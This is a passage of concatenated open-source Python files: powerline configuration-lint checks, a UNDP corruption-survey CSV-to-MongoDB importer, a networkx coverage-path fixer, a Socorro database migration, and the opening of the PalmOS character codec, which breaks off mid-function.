                    for r, h in zip(rs, required_pack):
                        echoerr(
                            context='Error while checking theme (key {key})'.format(key=context.key),
                            problem='found highlight group {0} not defined in the following colorschemes: {1}'.format(
                                h[0], list_sep.join(r))
                        )
                    hadproblem = True
        elif hl_groups is not None:
            # Docstring listed no groups (and did not opt out): by default
            # the function name doubles as its highlight group.
            r = hl_exists(function_name, data, context, echoerr, allow_gradients=True)
            if r:
                echoerr(
                    context='Error while checking theme (key {key})'.format(key=context.key),
                    problem=(
                        'found highlight group {0} not defined in the following colorschemes: {1}\n'
                        '(If not specified otherwise in documentation, '
                        'highlight group for function segments\n'
                        'is the same as the function name.)'
                    ).format(function_name, list_sep.join(r)),
                    problem_mark=function_name.mark
                )
                hadproblem = True

        return True, False, hadproblem
    elif context[-2][1].get('type') != 'segment_list':
        if function_name not in context[0][1].get('segment_data', {}):
            main_theme_name = data['main_config'].get('ext', {}).get(ext, {}).get('theme', None)
            if data['theme'] == main_theme_name:
                main_theme = {}
            else:
                main_theme = data['ext_theme_configs'].get(main_theme_name, {})
            if (
                function_name not in main_theme.get('segment_data', {})
                and function_name not in data['ext_theme_configs'].get('__main__', {}).get('segment_data', {})
                and not any(((function_name in theme.get('segment_data', {})) for theme in data['top_themes'].values()))
            ):
                echoerr(context='Error while checking segments (key {key})'.format(key=context.key),
                        problem='found useless use of name key (such name is not present in theme/segment_data)',
                        problem_mark=function_name.mark)

    return True, False, False
def hl_group_in_colorscheme(hl_group, cconfig, allow_gradients, data, context, echoerr):
    '''Return whether *hl_group* is usable in colorscheme config *cconfig*.

    ``allow_gradients`` may be False (gradients forbidden), True (allowed,
    colors not inspected) or 'force' (at least one gradient required).
    '''
    havemarks(hl_group, cconfig)
    if hl_group not in cconfig.get('groups', {}):
        return False
    elif not allow_gradients or allow_gradients == 'force':
        group_config = cconfig['groups'][hl_group]
        # Follow string aliases down to the actual fg/bg definition.
        while isinstance(group_config, unicode):
            try:
                group_config = cconfig['groups'][group_config]
            except KeyError:
                # No such group. Error was already reported when checking
                # colorschemes.
                return True
        havemarks(group_config)
        hadgradient = False
        for ckey in ('fg', 'bg'):
            color = group_config.get(ckey)
            if not color:
                # No color. Error was already reported when checking
                # colorschemes.
                return True
            havemarks(color)
            # Gradients are only allowed for function segments. Note that
            # whether *either* color or gradient exists should have been
            # already checked
            hascolor = color in data['colors_config'].get('colors', {})
            hasgradient = color in data['colors_config'].get('gradients', {})
            if hasgradient:
                hadgradient = True
            if allow_gradients is False and not hascolor and hasgradient:
                echoerr(
                    context='Error while checking highlight group in theme (key {key})'.format(
                        key=context.key),
                    context_mark=hl_group.mark,
                    problem='group {0} is using gradient {1} instead of a color'.format(hl_group, color),
                    problem_mark=color.mark
                )
                return False
        if allow_gradients == 'force' and not hadgradient:
            echoerr(
                context='Error while checking highlight group in theme (key {key})'.format(
                    key=context.key),
                context_mark=hl_group.mark,
                problem='group {0} should have at least one gradient color, but it has no'.format(hl_group),
                problem_mark=group_config.mark
            )
            return False
    return True
def hl_exists(hl_group, data, context, echoerr, allow_gradients=False):
    '''Return the names of colorschemes lacking a usable *hl_group*.

    An empty list means the group exists everywhere (or there are no
    colorschemes at all, which was already reported elsewhere).
    '''
    havemarks(hl_group)
    ext = data['ext']
    if ext not in data['colorscheme_configs']:
        # No colorschemes. Error was already reported, no need to report it
        # twice.
        return []
    return [
        colorscheme
        for colorscheme, cconfig in data['colorscheme_configs'][ext].items()
        if not hl_group_in_colorscheme(hl_group, cconfig, allow_gradients, data, context, echoerr)
    ]
def check_highlight_group(hl_group, data, context, echoerr):
    '''Check that *hl_group* is defined in every colorscheme.'''
    havemarks(hl_group)
    missing = hl_exists(hl_group, data, context, echoerr)
    if not missing:
        return True, False, False
    echoerr(
        context='Error while checking theme (key {key})'.format(key=context.key),
        problem='found highlight group {0} not defined in the following colorschemes: {1}'.format(
            hl_group, list_sep.join(missing)),
        problem_mark=hl_group.mark
    )
    return True, False, True
def check_highlight_groups(hl_groups, data, context, echoerr):
    '''Check that each colorscheme defines at least one group of *hl_groups*.'''
    havemarks(hl_groups)
    missing_lists = [hl_exists(hl_group, data, context, echoerr) for hl_group in hl_groups]
    # Only a problem when *every* alternative is missing somewhere.
    if not all(missing_lists):
        return True, False, False
    echoerr(
        context='Error while checking theme (key {key})'.format(key=context.key),
        problem='found highlight groups list ({0}) with all groups not defined in some colorschemes'.format(
            list_sep.join((unicode(h) for h in hl_groups))),
        problem_mark=hl_groups.mark
    )
    for missing, hl_group in zip(missing_lists, hl_groups):
        echoerr(
            context='Error while checking theme (key {key})'.format(key=context.key),
            problem='found highlight group {0} not defined in the following colorschemes: {1}'.format(
                hl_group, list_sep.join(missing)),
            problem_mark=hl_group.mark
        )
    return True, False, True
def check_segment_data_key(key, data, context, echoerr):
    '''Check that a segment_data *key* matches some segment in some theme.

    The key may be a segment name, a bare function name, or a fully
    qualified module.function name.
    '''
    havemarks(key)
    has_module_name = '.' in key
    found = False
    for ext, theme in list_themes(data, context):
        for segments in theme.get('segments', {}).values():
            for segment in segments:
                if 'name' in segment:
                    if key == segment['name']:
                        found = True
                        break
                else:
                    function_name = segment.get('function')
                    if function_name:
                        module, function_name = get_function_strings(function_name, ((None, theme),), ext)
                        if has_module_name:
                            # Dotted keys only match the qualified name.
                            full_name = module + '.' + function_name
                            if key == full_name:
                                found = True
                                break
                        else:
                            if key == function_name:
                                found = True
                                break
            if found:
                break
        if found:
            break
    else:
        # The outer loop ran to completion without a match.  Top-level
        # themes cannot see extension themes, so unmatched keys there are
        # tolerated.
        if data['theme_type'] != 'top':
            echoerr(context='Error while checking segment data',
                    problem='found key {0} that cannot be associated with any segment'.format(key),
                    problem_mark=key.mark)
            return True, False, True

    return True, False, False
# Specs validating the arguments common to threaded segments;
# ``shutdown_event`` must never be supplied from the configuration.
threaded_args_specs = {
    'interval': Spec().cmp('gt', 0.0),
    'update_first': Spec().type(bool),
    'shutdown_event': Spec().error('Shutdown event must be set by powerline'),
}
def check_args_variant(func, args, data, context, echoerr):
    '''Check configured *args* against the signature of segment *func*.

    Reports missing required arguments, unknown arguments, and (for
    threaded segments) validates the threading-related argument values.
    Returns whether a problem was found.
    '''
    havemarks(args)
    argspec = getconfigargspec(func)
    present_args = set(args)
    all_args = set(argspec.args)
    # BUG FIX: when there are no defaults, ``args[:-0]`` evaluates to an
    # empty list, so every required argument was silently treated as
    # optional.  Treat all arguments as required in that case.
    if argspec.defaults:
        required_args = set(argspec.args[:-len(argspec.defaults)])
    else:
        required_args = set(argspec.args)

    hadproblem = False

    if required_args - present_args:
        echoerr(
            context='Error while checking segment arguments (key {key})'.format(key=context.key),
            context_mark=args.mark,
            problem='some of the required keys are missing: {0}'.format(list_sep.join(required_args - present_args))
        )
        hadproblem = True

    if not all_args >= present_args:
        echoerr(context='Error while checking segment arguments (key {key})'.format(key=context.key),
                context_mark=args.mark,
                problem='found unknown keys: {0}'.format(list_sep.join(present_args - all_args)),
                problem_mark=next(iter(present_args - all_args)).mark)
        hadproblem = True

    if isinstance(func, ThreadedSegment):
        for key in set(threaded_args_specs) & present_args:
            proceed, khadproblem = threaded_args_specs[key].match(
                args[key],
                args.mark,
                data,
                context.enter_key(args, key),
                echoerr
            )
            if khadproblem:
                hadproblem = True
            if not proceed:
                return hadproblem

    return hadproblem
def check_args(get_functions, args, data, context, echoerr):
    '''Check *args* against every function the segment may resolve to.

    Errors raised while locating candidate functions are buffered in a
    DelayedEchoErr and only shown when no candidate was found at all.
    '''
    new_echoerr = DelayedEchoErr(echoerr)
    count = 0
    hadproblem = False
    for func in get_functions(data, context, new_echoerr):
        count += 1
        shadproblem = check_args_variant(func, args, data, context, echoerr)
        if shadproblem:
            hadproblem = True

    if not count:
        hadproblem = True
        if new_echoerr:
            # Import/lookup errors explain why nothing matched: replay them.
            new_echoerr.echo_all()
        else:
            echoerr(context='Error while checking segment arguments (key {key})'.format(key=context.key),
                    context_mark=context[-2][1].mark,
                    problem='no suitable segments found')

    return True, False, hadproblem
def get_one_segment_function(data, context, echoerr):
    '''Yield the single function referenced by the current segment, if any.'''
    ext = data['ext']
    function_name = context[-2][1].get('function')
    if not function_name:
        return
    module, function_name = get_function_strings(function_name, context, ext)
    func = import_segment(function_name, data, context, echoerr, module=module)
    if func:
        yield func
# Registry of segment names shared between modules: maps a short name to a
# set of (module, function) MarkedUnicode pairs.
common_names = defaultdict(set)


def register_common_name(name, cmodule, cname):
    # Record that *name* may resolve to cmodule.cname; synthetic marks point
    # into the combined "module.function" string for error reporting.
    s = cmodule + '.' + cname
    cmodule_mark = Mark('<common name definition>', 1, 1, s, 1)
    # NOTE(review): column/pointer len(cmodule) + 1 lands on the dot rather
    # than the first character of cname -- presumably close enough for error
    # marks; confirm against Mark's column convention.
    cname_mark = Mark('<common name definition>', 1, len(cmodule) + 1, s, len(cmodule) + 1)
    common_names[name].add((MarkedUnicode(cmodule, cmodule_mark), MarkedUnicode(cname, cname_mark)))
def get_all_possible_functions(data, context, echoerr):
    '''Yield every segment function a segment_data key may refer to.

    A dotted key resolves directly; a bare key is matched against registered
    common names and against segments used by any reachable theme.
    '''
    name = context[-2][0]
    module, name = name.rpartition('.')[::2]
    if module:
        func = import_segment(name, data, context, echoerr, module=module)
        if func:
            yield func
    else:
        if name in common_names:
            for cmodule, cname in common_names[name]:
                cfunc = import_segment(cname, data, context, echoerr, module=MarkedUnicode(cmodule, None))
                if cfunc:
                    yield cfunc
        for ext, theme_config in list_themes(data, context):
            for segments in theme_config.get('segments', {}).values():
                for segment in segments:
                    if segment.get('type', 'function') == 'function':
                        function_name = segment.get('function')
                        current_name = segment.get('name')
                        if function_name:
                            module, function_name = get_function_strings(function_name, ((None, theme_config),), ext)
                            # Match either the segment's explicit name or its
                            # resolved function name.
                            if current_name == name or function_name == name:
                                func = import_segment(function_name, data, context, echoerr, module=module)
                                if func:
                                    yield func
def check_exinclude_function(name, data, context, echoerr):
    '''Check that an include/exclude selector function can be imported.'''
    ext = data['ext']
    module, name = name.rpartition('.')[::2]
    if not module:
        # Bare names resolve inside the stock selector package for ext.
        module = MarkedUnicode('powerline.selectors.' + ext, None)
    func = import_function('selector', name, data, context, echoerr, module=module)
    return (True, False, False) if func else (True, False, True)
def check_log_file_level(this_level, data, context, echoerr):
    '''Check handler level specified in :ref:`log_file key <config-common-log>`

    This level must be greater or equal to the level in :ref:`log_level key
    <config-common-log_level>`.
    '''
    havemarks(this_level)
    hadproblem = False
    top_level = context[0][1].get('common', {}).get('log_level', 'WARNING')
    top_level_str = top_level
    top_level_mark = getattr(top_level, 'mark', None)
    # Unknown level names are reported by the level spec itself: skip.
    if (
        not isinstance(top_level, unicode) or not hasattr(logging, top_level)
        or not isinstance(this_level, unicode) or not hasattr(logging, this_level)
    ):
        return True, False, hadproblem
    top_level = getattr(logging, top_level)
    this_level_str = this_level
    this_level_mark = this_level.mark
    this_level = getattr(logging, this_level)
    if this_level < top_level:
        echoerr(
            context='Error while checking log level index (key {key})'.format(
                key=context.key),
            context_mark=this_level_mark,
            # BUG FIX: the message previously used {0} in both slots, so the
            # handler level was printed twice; also "then" -> "than".
            problem='found level that is less critical than top level ({0} < {1})'.format(
                this_level_str, top_level_str),
            problem_mark=top_level_mark,
        )
        hadproblem = True
    return True, False, hadproblem
def check_logging_handler(handler_name, data, context, echoerr):
    '''Check that *handler_name* resolves to a logging.Handler subclass.

    A bare class name is looked up in ``logging.handlers``.
    '''
    havemarks(handler_name)
    import_paths = [os.path.expanduser(path) for path in context[0][1].get('common', {}).get('paths', [])]

    handler_module, separator, handler_class = handler_name.rpartition('.')
    if not separator:
        handler_module = 'logging.handlers'
        handler_class = handler_name
    with WithPath(import_paths):
        try:
            handler = getattr(__import__(str(handler_module), fromlist=[str(handler_class)]), str(handler_class))
        except ImportError:
            echoerr(context='Error while loading logger class (key {key})'.format(key=context.key),
                    problem='failed to load module {0}'.format(handler_module),
                    problem_mark=handler_name.mark)
            return True, False, True
        except AttributeError:
            echoerr(context='Error while loading logger class (key {key})'.format(key=context.key),
                    problem='failed to load handler class {0}'.format(handler_class),
                    problem_mark=handler_name.mark)
            return True, False, True

    if not issubclass(handler, logging.Handler):
        echoerr(context='Error while loading logger class (key {key})'.format(key=context.key),
                problem='loaded class {0} is not a logging.Handler subclass'.format(handler_class),
                problem_mark=handler_name.mark)
        return True, False, True

    return True, False, False
|
opendatakosovo/undp-gender-survey-of-corruption-data-importer | refs/heads/master | gender_survey.py | 1 | from pymongo import MongoClient
import csv
import re
# Connect to the local MongoDB instance and empty the target collection so
# that repeated imports do not duplicate survey documents.
mongo = MongoClient()
db = mongo.undp
collection = db.gsc
collection.remove({})
def parse():
    # Import every survey row from the CSV into MongoDB.  Each row becomes
    # one document combining the surveyee demographics with the fifteen
    # question sub-documents built by the build_q*_doc helpers below.
    print "\nImporting data..."
    with open('data/undpGenderSurveyOfCorruption.csv', 'rb') as csvfile:
        reader = csv.reader(csvfile, delimiter=',')

        # Skip the header rows
        next(reader, None)

        doc_count = 0
        for row in reader:
            doc = {
                "surveyee": build_surveyee_doc(row),
                "q1": build_q1_doc(row),
                "q2": build_q2_doc(row),
                "q3": build_q3_doc(row),
                "q4": build_q4_doc(row),
                "q5": build_q5_doc(row),
                "q6": build_q6_doc(row),
                "q7": build_q7_doc(row),
                "q8": build_q8_doc(row),
                "q9": build_q9_doc(row),
                "q10": build_q10_doc(row),
                "q11": build_q11_doc(row),
                "q12": build_q12_doc(row),
                "q13": build_q13_doc(row),
                "q14": build_q14_doc(row),
                "q15": build_q15_doc(row),
            }
            collection.insert(doc)
            doc_count = doc_count + 1

        print "Done. Imported %i surveys.\n" % doc_count
def build_surveyee_doc(row):
    """Build the surveyee (demographics) sub-document from one CSV row.

    Columns 72-82 hold gender, ethnicity, age bracket, marital status,
    employment, education, income bracket, municipality and region.
    """
    age_range = row[74]
    age = {}
    if age_range == '60+':
        # Open-ended top bracket: only a lower bound.
        age = {
            "label": row[74],
            "from": 60
        }
    else:
        # Brackets look like "18-24 ..."; keep the full label, parse bounds.
        age_range = row[74].split(' ')[0]
        age = {
            "label": row[74],
            "from": int(age_range.split('-')[0]),
            "to": int(age_range.split('-')[1]),
        }

    income_range = re.findall(r'\d+', row[80])
    income = {}
    # BUG FIX: "Less than N" is an upper bound ("to"), and a single number
    # without "Less" (e.g. "More than N") is a lower bound ("from"); the
    # original assignments were swapped.  Also require at least one digit so
    # unexpected digit-free labels fall through to the label-only branch
    # instead of raising IndexError.
    if row[80] != "No answer / Refuse" and income_range:
        if len(income_range) == 1 and row[80].startswith("Less"):
            income = {
                "label": row[80],
                "to": int(income_range[0])
            }
        elif len(income_range) == 1:
            income = {
                "label": row[80],
                "from": int(income_range[0]),
            }
        else:
            income = {
                "label": row[80],
                "from": int(income_range[0]),
                "to": int(income_range[1]),
            }
    else:
        income = {
            "label": row[80]
        }

    doc = {
        "gender": row[72],
        "ethnicity": row[73],
        "age": age,
        "maritalstatus": row[75],
        "employment": {
            "level": row[76],
            "institution": row[77],
            "position": row[78],
        },
        "education": row[79],
        "income": income,
        "municipality": row[81],
        "region": row[82]
    }
    return doc
def build_q1_doc(row):
    """Build the document for question 1 (which workplace practices are seen
    as corrupt).  Columns 0-11 hold one flag per listed practice."""
    practices = (
        "Accepting gifts or hospitality from a civil servant",
        "Taking supplies or materials from work for home use",
        "Paying or receiving rewards for keeping silent about workplace issues",
        "Performing or receiving sexual favors in exchange for promotion or money",
        "Paying or receiving payment for a promotion or permanent job within the civil service",
        "Paying or receiving a payment for awarding contracts or positions",
        "Not declaring a conflict of interest when recruiting staff or awarding contracts",
        "Not working required hours",
        "Leaving work early without permission",
        "Flirting with a colleague",
        "Asking friends who are well connected for favors to help your government work",
        "Claiming reimbursements to attend private functions hosted by a work colleague",
    )
    answers = {}
    for offset, text in enumerate(practices):
        answers["a%d" % (offset + 1)] = {
            "text": text,
            "value": convert_to_int(row[offset]),
        }
    return {
        "question": "Which of these practices within the workplace do you think are corrupt?",
        "answers": answers,
    }
def build_q2_doc(row):
    """Build the document for question 2 (forms of corruption believed to
    exist in the civil service).  Columns 12-17 hold one flag per form."""
    forms = (
        "Embezzlement, theft (including time theft not working required hours) and fraud",
        "Extortion (including sexual extortion)",
        "Nepotism, favoritism and patronage",
        "Bribery",
        "Abuse of discretionary powers",
        "Trading in influence",
    )
    answers = {}
    for index, text in enumerate(forms):
        answers["a%d" % (index + 1)] = {
            "text": text,
            "value": convert_to_int(row[12 + index]),
        }
    return {
        "question": "What forms of corruption do you believe exist across the entire civil service in your country?",
        "answers": answers,
    }
def build_q3_doc(row):
    """Build the document for question 3 (perceived prevalence).

    Column 18 holds the chosen answer index as a string ("1".."5"); the
    matching answer's value becomes 1, all others stay 0.
    """
    labels = (
        "Not prevalent",
        "A bit prevalent",
        "Somewhat prevalent",
        "Prevalent",
        "Very prevalent",
    )
    answers = {}
    for index, label in enumerate(labels):
        answers["a%d" % (index + 1)] = {
            "text": label,
            "value": 0,
        }
    answers["a" + row[18]]["value"] = 1
    return {
        "question": "How prevalent do you believe corruption is in the civil service of your country?",
        "answers": answers,
    }
def build_q4_doc(row):
    """Build the yes/no document for question 4 (witnessed corruption).

    Column 19 holds 0 for "No" or 1 for "Yes".
    """
    answers = {
        "a1": {"text": "No", "value": 0},
        "a2": {"text": "Yes", "value": 0},
    }
    chosen = convert_to_int(row[19])
    answers["a" + str(chosen + 1)]["value"] = 1
    return {
        "question": "Have you ever witnessed corruption in your current workplace?",
        "answers": answers,
    }
def build_q5_doc(row):
    """Build the document for question 5 (type of corruption witnessed).
    Columns 20-25 hold one flag per corruption form."""
    forms = (
        "Embezzlement, theft (including time theft not working required hours) and fraud",
        "Extortion (including sexual extortion)",
        "Nepotism, favoritism and patronage",
        "Bribery",
        "Abuse of discretionary powers",
        "Trading in influence",
    )
    answers = {}
    for index, text in enumerate(forms):
        answers["a%d" % (index + 1)] = {
            "text": text,
            "value": convert_to_int(row[20 + index]),
        }
    return {
        "question": "What best describes the corruption you witnessed?",
        "answers": answers,
    }
def build_q6_doc(row):
    # Build the document for question 6 (did you report the witnessed
    # corruption?).  Column 26 holds the answer; column 27 carries the
    # follow-up asked when the answer was "No".
    doc = {
        "question": "Did you report the corruption described?",
        "answers": {
            "a1": {
                "text": "No",
                "value": 0,
            },
            "a2": {
                "text": "Yes",
                "value": 0,
            },
            "a3": {
                "text": "Choose not to answer",
                "value": 0,
            },
        }
    }
    answer = convert_to_int(row[26])
    # NOTE(review): presumably convert_to_int returns 'n/a' for blank cells,
    # mapped here to "Choose not to answer" -- confirm against its
    # definition further down the file.
    if answer != 'n/a':
        doc['answers']['a' + str(answer + 1)]['value'] = 1
        if answer == 0:
            # "No" answers carry an explanation in the next column.
            doc['followup'] = build_followup_question_doc(row[27])
    else:
        doc['answers']['a3']['value'] = 1
    return doc
def build_q7_doc(row):
    """Build the document for question 7 (asked to participate: yes/no).

    row[28] is "Yes"/"No"; the matching answer slot gets value 1.
    """
    doc = {
        "question": "In your current workplace, have you ever been asked to participate in corrupt practices?",
        "answers": {
            "a%d" % (index + 1): {"text": text, "value": 0}
            for index, text in enumerate(("No", "Yes"))
        },
    }
    selected = convert_to_int(row[28])
    doc['answers']["a" + str(selected + 1)]['value'] = 1
    return doc
def build_q8_doc(row):
    """Build the document for question 8 (type of corruption participated in).

    Columns 29-34 are independent Yes/No checkboxes, each converted to 1/0.
    """
    options = (
        ("Embezzlement, theft (including time theft not working required hours) and fraud", 29),
        ("Extortion (including sexual extortion)", 30),
        ("Nepotism, favoritism and patronage", 31),
        ("Bribery", 32),
        ("Abuse of discretionary powers", 33),
        ("Trading in influence", 34),
    )
    return {
        "question": "What best describes the type of corruption you participated in?",
        "answers": {
            "a%d" % (index + 1): {"text": text, "value": convert_to_int(row[column])}
            for index, (text, column) in enumerate(options)
        },
    }
def build_q9_doc(row):
    """Build the document for question 9 (did you report it?).

    Mirrors build_q6_doc but reads columns 35 (answer) and 36 (follow-up).
    """
    option_texts = ("No", "Yes", "Choose not to answer")
    doc = {
        "question": "Did you report the corruption described?",
        "answers": {
            "a%d" % (index + 1): {"text": text, "value": 0}
            for index, text in enumerate(option_texts)
        },
    }
    answer = convert_to_int(row[35])
    if answer == 'n/a':
        doc['answers']['a3']['value'] = 1
    else:
        doc['answers']["a" + str(answer + 1)]['value'] = 1
        if answer == 0:
            doc['followup'] = build_followup_question_doc(row[36])
    return doc
def build_q10_doc(row):
    """Build the document for question 10 (how speaking out is encouraged).

    Columns 37-43 are independent Yes/No checkboxes converted to 1/0.

    Bug fix: the original dict literal used the key "a3" twice, so the
    entry for row[39] ("Has a senior management team ...") was silently
    overwritten and lost, and the remaining answers were misnumbered.
    Answers are now numbered a1..a7 so every column is preserved.
    """
    options = (
        ("It has an established and functional workplace grievance mechanism", 37),
        ("Information is available on laws and policies relating to corruption, accountability and good governance equally for men", 38),
        ("Has a senior management team that is equally supportive of men and women employees", 39),
        ("Gender equality considerations are included in all workplace policies", 40),
        ("Has a gender responsive anti-corruption policy", 41),
        ("Men and women employees that report corruption are protected from reprisals", 42),
        ("Has established relationships with non-government organizations and government organizations working to fight against corrupti", 43),
    )
    return {
        "question": "How does the civil service encourage men and women to speak out against corruption or a lack of transparency in management?",
        "answers": {
            "a%d" % (index + 1): {"text": text, "value": convert_to_int(row[column])}
            for index, (text, column) in enumerate(options)
        },
    }
def build_q11_doc(row):
    """Build the document for question 11 (policies made available).

    Columns 44-54 are independent Yes/No checkboxes converted to 1/0.

    Bug fix: the original dict literal used the key "a3" twice, so the
    entry for row[46] ("Promotion policies") was silently overwritten and
    lost, and the remaining answers were misnumbered.  Answers are now
    numbered a1..a11 so every column is preserved.
    """
    options = (
        ("Recruitment policies and requirements (such as exam results, qualifications, age, level)", 44),
        ("Salary and remuneration policies including overtime", 45),
        ("Promotion policies", 46),
        ("Working hours policies", 47),
        ("Training or professional development opportunities", 48),
        ("Retrenchment policies", 49),
        ("Retirement policies", 50),
        ("Redundancy policies", 51),
        ("Disciplinary measures", 52),
        ("Code of conduct", 53),
        ("Anti-corruption policies", 54),
    )
    return {
        "question": "Have workplace policies relating to your employment been made available to you?",
        "answers": {
            "a%d" % (index + 1): {"text": text, "value": convert_to_int(row[column])}
            for index, (text, column) in enumerate(options)
        },
    }
def build_q12_doc(row):
    """Build the document for question 12 (quality of policy information).

    Columns 55-58 are independent Yes/No checkboxes converted to 1/0.
    The question text (including its original wording) is kept verbatim
    because downstream consumers match on it.
    """
    options = (
        ("The information provided was relevant to my situation", 55),
        ("The information was provided in a timely manner", 56),
        ("The information provided was accurate", 57),
        ("I could easily understand the information", 58),
    )
    return {
        "question": "How would you described the information provided in the policies and regulations?",
        "answers": {
            "a%d" % (index + 1): {"text": text, "value": convert_to_int(row[column])}
            for index, (text, column) in enumerate(options)
        },
    }
def build_q13_doc(row):
    """Build the document for question 13 (equal working conditions).

    Columns 59-68 are independent Yes/No checkboxes converted to 1/0.
    """
    options = (
        ("Women and men enjoy the same recruitment requirements (such as exam results, qualifications, age, level)", 59),
        ("Women and men enjoy the same salary and remuneration, including overtime", 60),
        ("Women and men are subject to the same promotion procedures", 61),
        ("Women and men work the same hours", 62),
        ("Women and men enjoy the same training opportunities", 63),
        ("Women and men enjoy the same professional development opportunities", 64),
        ("Women and men are subject to the same retrenchment policies / procedures", 65),
        ("Women and men are subject to the same retirement regulations", 66),
        ("Women and men are subject to the same redundancy packages", 67),
        ("Women and men are subject to the same disciplinary measures", 68),
    )
    return {
        "question": "In your opinion, do men and women enjoy the same working conditions within the civil service?",
        "answers": {
            "a%d" % (index + 1): {"text": text, "value": convert_to_int(row[column])}
            for index, (text, column) in enumerate(options)
        },
    }
def build_q14_doc(row):
    """Build the document for question 14 (discretionary powers: yes/no).

    row[69] is "Yes"/"No"; the matching answer slot gets value 1.
    """
    doc = {
        "question": "Do discretionary powers exist within the public administration whereby management can grant additional pay or benefits to certain employees?",
        "answers": {
            "a%d" % (index + 1): {"text": text, "value": 0}
            for index, text in enumerate(("No", "Yes"))
        },
    }
    selected = convert_to_int(row[69])
    doc['answers']["a" + str(selected + 1)]['value'] = 1
    return doc
def build_q15_doc(row):
    """Build the document for question 15 (criteria made available to staff).

    row[70] is the answer ("n/a" maps to "Choose not to answer"); a
    follow-up document is always attached from row[71].
    """
    option_texts = ("No", "Yes", "Choose not to answer")
    doc = {
        "question": "If you answered yes to the previous question, is the criteria for granting additional pay and benefits made available to all staff?",
        "answers": {
            "a%d" % (index + 1): {"text": text, "value": 0}
            for index, text in enumerate(option_texts)
        },
    }
    answer = convert_to_int(row[70])
    if answer == 'n/a':
        doc['answers']['a3']['value'] = 1
    else:
        doc['answers']["a" + str(answer + 1)]['value'] = 1
    # Unlike q6/q9, the follow-up is attached regardless of the answer.
    doc['followup'] = build_followup_question_15_doc(row[71])
    return doc
def convert_to_int(data_string):
    """Map a survey cell to an int flag.

    "Yes" -> 1; "No" and the long "No, I did not report it because"
    variant -> 0; anything else -> the string "n/a" (callers test for it).
    """
    known_values = {
        "Yes": 1,
        "No": 0,
        "No, I did not report it because": 0,
    }
    return known_values.get(data_string, "n/a")
def convert_followup_answer_to_key_index(answer):
    """Map a follow-up answer string to its 1-based answer-key index.

    Unrecognized answers fall through to 6 ("Choose not to answer").
    """
    index_by_answer = {
        "Afraid of retaliation": 1,
        "Did not want to get involved": 2,
        "Does not work": 3,
        "The risk of losing my job": 4,
        "Do not know": 5,
    }
    return index_by_answer.get(answer, 6)
def build_followup_question_doc(answer):
    """Build the follow-up document for "why didn't you report it".

    The answer string is mapped to one of six fixed options (unknown text
    lands on a6, "Choose not to answer") and that option is flagged.
    """
    option_texts = (
        "Afraid of retaliation",
        "Did not want to get involved",
        "Does not work",
        "The risk of losing my job",
        "Do not know",
        "Choose not to answer",
    )
    doc = {
        "question": "No, I did not report it because",
        "answers": {
            "a%d" % (index + 1): {"text": text, "value": 0}
            for index, text in enumerate(option_texts)
        },
    }
    selected = convert_followup_answer_to_key_index(answer)
    doc['answers']["a" + str(selected)]['value'] = 1
    return doc
def build_followup_question_15_doc(answer):
    """Build the follow-up document for question 15 (equal accessibility).

    "n/a" (unrecognized text) maps to a3 ("Choose not to answer").
    """
    option_texts = ("No", "Yes", "Choose not to answer")
    doc = {
        "question": "Do you think they are equally accessible for women and men?",
        "answers": {
            "a%d" % (index + 1): {"text": text, "value": 0}
            for index, text in enumerate(option_texts)
        },
    }
    selected = convert_to_int(answer)
    if selected == 'n/a':
        doc['answers']['a3']['value'] = 1
    else:
        doc['answers']["a" + str(selected + 1)]['value'] = 1
    return doc
# Entry point: run the CSV -> document conversion defined above.
parse()
|
ghdk/networkx | refs/heads/master | fixcoverage.py | 30 | import pickle
import re
import sys
def main(argv):
    """Rewrite filename prefixes inside a pickled .coverage data file.

    argv[1] is a regex matched against each recorded NetworkX filename and
    argv[2] its replacement; the file is loaded, rewritten and saved back
    in place.  Only entries whose path contains 'networkx' are touched.
    """
    source, dest = argv[1], argv[2]
    with open('.coverage', 'rb') as f:
        coverage_data = pickle.load(f)
    # Snapshot the matching keys first: the dict is mutated while renaming.
    networkx_files = [name for name in coverage_data['lines'].keys()
                      if 'networkx' in name]
    for name in networkx_files:
        renamed = re.sub(source, dest, name)
        if renamed != name:
            coverage_data['lines'][renamed] = coverage_data['lines'].pop(name)
    with open('.coverage', 'wb') as f:
        pickle.dump(coverage_data, f)


if __name__ == '__main__':
    sys.exit(main(sys.argv))
|
bsmedberg/socorro | refs/heads/master | alembic/versions/1495b7307dd3_bug_1005326_filter_out_null.py | 14 | """bug 1005326 - filter out NULL
Revision ID: 1495b7307dd3
Revises: 1961d1f70175
Create Date: 2014-05-06 16:40:36.199526
"""
# revision identifiers, used by Alembic.
revision = '1495b7307dd3'
down_revision = '1961d1f70175'
from alembic import op
from socorro.lib import citexttype, jsontype, buildtype
from socorro.lib.migrations import fix_permissions, load_stored_proc
import sqlalchemy as sa
from sqlalchemy import types
from sqlalchemy.dialects import postgresql
from sqlalchemy.sql import table, column
def upgrade():
    """Reload the correlations stored procedures (bug 1005326: filter out NULL)."""
    procedures = [
        'update_correlations_addon.sql',
        'update_correlations_core.sql',
        'update_correlations_module.sql',
    ]
    load_stored_proc(op, procedures)
def downgrade():
    """Reload the same stored procedures; the .sql files carry the revert."""
    procedures = [
        'update_correlations_addon.sql',
        'update_correlations_core.sql',
        'update_correlations_module.sql',
    ]
    load_stored_proc(op, procedures)
|
harmy/kbengine | refs/heads/master | kbe/src/lib/python/Lib/encodings/palmos.py | 647 | """ Python Character Mapping Codec for PalmOS 3.5.
Written by Sjoerd Mullender (sjoerd@acm.org); based on iso8859_15.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
    """Stateless codec translating via the module-level charmap tables."""

    def encode(self,input,errors='strict'):
        # Returns (bytes, length-consumed) per the stateless codec API.
        return codecs.charmap_encode(input,errors,encoding_map)

    def decode(self,input,errors='strict'):
        return codecs.charmap_decode(input,errors,decoding_map)
class IncrementalEncoder(codecs.IncrementalEncoder):
    """Incremental encoder; charmap encoding needs no cross-call state."""

    def encode(self, input, final=False):
        # [0] drops the length, as the incremental API returns bytes only.
        return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
    """Incremental decoder; charmap decoding needs no cross-call state."""

    def decode(self, input, final=False):
        return codecs.charmap_decode(input,self.errors,decoding_map)[0]
class StreamWriter(Codec,codecs.StreamWriter):
    # Inherits encode() from Codec and stream handling from StreamWriter.
    pass
class StreamReader(Codec,codecs.StreamReader):
    # Inherits decode() from Codec and stream handling from StreamReader.
    pass
### encodings module API
def getregentry():
    """Return the CodecInfo registration entry for the 'palmos' encoding."""
    codec = Codec()
